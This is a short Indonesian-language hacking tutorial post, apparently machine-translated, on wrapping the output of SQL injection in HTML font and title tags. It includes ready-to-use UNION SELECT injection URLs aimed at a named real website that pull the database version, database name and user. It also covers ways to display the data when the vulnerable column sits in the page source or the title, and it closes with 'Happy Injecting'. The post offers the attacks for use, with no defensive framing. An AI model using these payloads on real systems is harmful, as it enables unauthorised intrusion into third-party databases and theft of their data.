Header Ads

Menambahkan Tag HTML dalam Query SQL

Tag HTML bisa digunakan Untuk banyak Fun di SQL Queries. Kita bisa menggunakan Tag HTML untuk Membuat Hasil Penuh Warna pada Output. Kadang kita menyuntik situs dan kolom yang rentan ada di judul atau di halaman sumber sehingga kita juga bisa menggunakan tag HTML di sana untuk menampilkan output di halaman.
Jadi Kita Akan Mulai Menambah Tag HTML Untuk membuat Output Beberapa Warna Penuh.
Inilah contohnya. Kami ingin Mencetak Versi dengan Warna Merah Jadi Berikut adalah TAG HTML kami untuk Menampilkan Versi dengan Warna MERAH.
 <font color=red>

Concat(OUR_HTML_TAG,QUERY_HERE)

mari kita lihat hasilnya. Sebelum Melaksanakan Query First Encode HTML TAG di Hex Value atau Use Single Quote Sebelum dan Sesudah Tag HTML Untuk Membuatnya Dapat Dieksekusi

http://www.kimclement.com/basiccal/event.php
?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version()),8,9--+



Adding HTML Tags in SQL Queries

Dan Anda bisa Lihat Versi berwarna RED. jika kita ingin menggunakan Diffirent Colors untuk masing-masing Command Like Displaying Version dalam warna Merah , Database dalam warna hijau ,User dalam warna Biru jadi akan menggunakan HTML Tag berbeda untuk setiap tugas.

Lihat contoh
Concat(Version RED Color ,Database in Green Color,User in Blue Color)
HTML Tags For Each Task:
Red color: <font color=red>
Green Color: <font color=green>
Blue Color: <font color=blue>

Jadi Query Final kami Untuk Menampilkan Setiap tugas dalam warna yang berbeda Akan,

Concat(<font color=red>,version(),<font color=green>,database(),<font color=blue>,user())

Contoh :
http://www.kimclement.com/basiccal/event.php
?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version(),0x3a,'<font color=green>',database(),0x3a,'<font color=blue>',user()),8,9--+



Adding HTML Tags in SQL Queries

Dan lihat gambar semua Tasks lengkap. Dengan cara ini Anda juga bisa menampilkan Tabel dan Kolom dengan warna yang berbeda.
Setelah Menampilkan Perintah SQLi dalam Warna yang Berbeda.
Sekarang mari kita lihat bagaimana kita dapat menampilkan data ketika Kolom Rentan kita ada di Halaman Sumber atau dalam TTTLE Menggunakan HTML TAGS.

When Vulnerable Column is in Source Page. ?
Concat(STARTING_HTML_TAG,OUR_QUERY,ENDING_HTML_TAG)

jadi kita akan menggunakan HTML TAG ini untuk menampilkan Data pada Halaman jika Kolom Rentan kita ada di halaman Sumber.

HTML TAG:Concat(<font size="8" color="red">,Version(),</font>) 

dan kadang-kadang Kolom Rentan kita ada dalam Judul sehingga dalam hal ini kita akan menggunakan Tag HTML ini untuk Mencetak Data di Webpage

HTML TAG:Concat(</title>,Version())

gunakan Tag HTML ini setelah melakukan pengkodean di Hex Value atau PUT Single Quote sebelum dan sesudah Tag HTML untuk membuat Query Executable.

Happy Injecting :)

No comments